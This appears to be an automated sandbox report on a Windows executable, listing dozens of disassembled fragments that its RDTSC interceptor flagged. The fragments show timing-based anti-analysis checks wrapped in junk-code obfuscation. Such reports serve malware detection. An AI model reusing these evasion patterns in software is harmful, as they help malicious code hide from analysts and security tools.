            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507312 second address: 50736F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007F4664873C0Ah 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 push eax 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 jmp 00007F4664873C13h 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 jne 00007F4664873C0Ah 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b jp 00007F4664873C14h 0x00000031 pushad 0x00000032 jng 00007F4664873C06h 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507446 second address: 50744C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F040C second address: 4F0411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F0411 second address: 4F041B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F466483F646h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F041B second address: 4F043F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4664873C06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F4664873C0Eh 0x00000013 jbe 00007F4664873C0Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F337D second address: 4F3382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F430F second address: 4F4313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F538E second address: 4F5392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F5392 second address: 4F539C instructions: 0x00000000 rdtsc 0x00000002 js 00007F4664873C06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF057 second address: 4EF05B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF05B second address: 4EF071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4664873C0Ch 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50ADE2 second address: 50ADFC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F466483F655h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B3EE second address: 50B3F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B3F6 second address: 50B3FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B3FA second address: 50B404 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4664873C06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B404 second address: 50B410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B6E9 second address: 50B706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 push eax 0x00000011 jmp 00007F4664873C0Bh 0x00000016 pop eax 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B706 second address: 50B710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F466483F646h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50BB29 second address: 50BB2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50BB2D second address: 50BB33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50BB33 second address: 50BB55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C0Eh 0x00000007 push ebx 0x00000008 jmp 00007F4664873C0Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50BB55 second address: 50BB61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50BB61 second address: 50BB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F4664873C11h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50BF7B second address: 50BF80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50BF80 second address: 50BFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jne 00007F4664873C06h 0x0000000e jng 00007F4664873C06h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 js 00007F4664873C1Eh 0x0000001d push ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120E8 second address: 5120EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120EE second address: 5120F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120F8 second address: 5120FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120FC second address: 51210D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4664873C06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51210D second address: 512131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F466483F650h 0x00000009 popad 0x0000000a jmp 00007F466483F64Ah 0x0000000f popad 0x00000010 push ecx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512813 second address: 51281D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51281D second address: 512821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512B30 second address: 512B43 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4664873C0Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512B43 second address: 512B57 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 ja 00007F466483F646h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F466483F646h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512B57 second address: 512B74 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4664873C06h 0x00000008 jmp 00007F4664873C0Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512B74 second address: 512B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512B78 second address: 512B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512B7C second address: 512B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3788 second address: 4E3842 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jno 00007F4664873C14h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F4664873C08h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 mov edx, edi 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a mov edx, 21AED052h 0x0000003f mov dword ptr [ebp+1248A3A2h], esp 0x00000045 mov cx, di 0x00000048 cmp dword ptr [ebp+122D2EC1h], 00000000h 0x0000004f jne 00007F4664873CACh 0x00000055 xor edx, dword ptr [ebp+122D2D3Dh] 0x0000005b mov byte ptr [ebp+122D390Ah], 00000047h 0x00000062 mov eax, D49AA7D2h 0x00000067 push 00000000h 0x00000069 push edx 0x0000006a call 00007F4664873C08h 0x0000006f pop edx 0x00000070 mov dword ptr [esp+04h], edx 0x00000074 add dword ptr [esp+04h], 00000015h 0x0000007c inc edx 0x0000007d push edx 0x0000007e ret 0x0000007f pop edx 0x00000080 ret 0x00000081 mov edx, 43E1DEBBh 0x00000086 nop 0x00000087 push ecx 0x00000088 push eax 0x00000089 push edx 0x0000008a jc 00007F4664873C06h 0x00000090 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3E37 second address: 4E3E3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3E3D second address: 4E3E4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3E4C second address: 4E3E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3E50 second address: 4E3E5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3E5F second address: 4E3E75 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F466483F648h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b push edi 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3E75 second address: 4E3E7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3F70 second address: 4E3F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3F74 second address: 4E3F78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3F78 second address: 4E3F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3F7E second address: 4E3FEA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F4664873C19h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F4664873C12h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 jmp 00007F4664873C0Bh 0x0000001b jmp 00007F4664873C10h 0x00000020 popad 0x00000021 mov eax, dword ptr [eax] 0x00000023 jmp 00007F4664873C0Eh 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3FEA second address: 4E3FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E4561 second address: 4E457B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E480C second address: 4E4812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E4812 second address: 4E4816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E4895 second address: 4E4924 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F466483F659h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F466483F648h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 pushad 0x0000002a mov ecx, 3A4F4AC7h 0x0000002f mov dword ptr [ebp+122D2F6Ch], eax 0x00000035 popad 0x00000036 lea eax, dword ptr [ebp+1248A38Eh] 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007F466483F648h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 00000017h 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 pushad 0x00000057 mov ecx, dword ptr [ebp+122D1827h] 0x0000005d mov esi, dword ptr [ebp+1247DA36h] 0x00000063 popad 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 push ecx 0x00000068 push eax 0x00000069 pop eax 0x0000006a pop ecx 0x0000006b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E4924 second address: 4E4975 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F4664873C19h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+1245F989h], edx 0x00000014 or dword ptr [ebp+122D38DBh], esi 0x0000001a lea eax, dword ptr [ebp+1248A34Ah] 0x00000020 pushad 0x00000021 mov ecx, 5FF6FC7Ah 0x00000026 xor edi, 31DE0A22h 0x0000002c popad 0x0000002d mov dword ptr [ebp+122D2F7Ah], edi 0x00000033 nop 0x00000034 pushad 0x00000035 push edi 0x00000036 pushad 0x00000037 popad 0x00000038 pop edi 0x00000039 push eax 0x0000003a push edx 0x0000003b push ecx 0x0000003c pop ecx 0x0000003d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E4975 second address: 4E4985 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F466483F646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E4985 second address: 4C52A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F4664873C0Bh 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F4664873C08h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 pushad 0x00000027 mov dword ptr [ebp+122D1BD3h], eax 0x0000002d mov cx, 9846h 0x00000031 popad 0x00000032 call dword ptr [ebp+122D2506h] 0x00000038 pushad 0x00000039 push edi 0x0000003a jne 00007F4664873C06h 0x00000040 jmp 00007F4664873C15h 0x00000045 pop edi 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 pop eax 0x0000004a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C52A5 second address: 4C52A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519225 second address: 51922B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51922B second address: 51923C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F466483F64Bh 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51923C second address: 51925C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4664873C15h 0x00000008 jmp 00007F4664873C0Fh 0x0000000d pushad 0x0000000e jng 00007F4664873C06h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51925C second address: 519262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519685 second address: 519695 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4664873C0Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519695 second address: 51969B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5197FD second address: 51980C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F4664873C06h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519AAF second address: 519AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519C17 second address: 519C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B6BD second address: 51B6D7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F466483F654h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F907 second address: 51F90B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F90B second address: 51F915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F915 second address: 51F919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F919 second address: 51F91F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F91F second address: 51F937 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C12h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F937 second address: 51F93B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F93B second address: 51F93F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51FC60 second address: 51FC66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51FC66 second address: 51FC79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C0Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51FC79 second address: 51FC99 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F466483F646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F466483F652h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51FC99 second address: 51FC9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 520192 second address: 5201A0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F466483F646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5201A0 second address: 5201A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5201A6 second address: 5201DC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F466483F646h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F466483F64Ch 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F466483F658h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 520325 second address: 520329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5205C4 second address: 5205F1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F466483F646h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jp 00007F466483F646h 0x00000013 jmp 00007F466483F650h 0x00000018 ja 00007F466483F646h 0x0000001e popad 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52076B second address: 520785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4664873C16h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 520785 second address: 520796 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F466483F64Ch 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 520796 second address: 52079C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52079C second address: 5207A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5207A7 second address: 5207D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4664873C11h 0x0000000b popad 0x0000000c js 00007F4664873C0Eh 0x00000012 js 00007F4664873C06h 0x00000018 pushad 0x00000019 popad 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
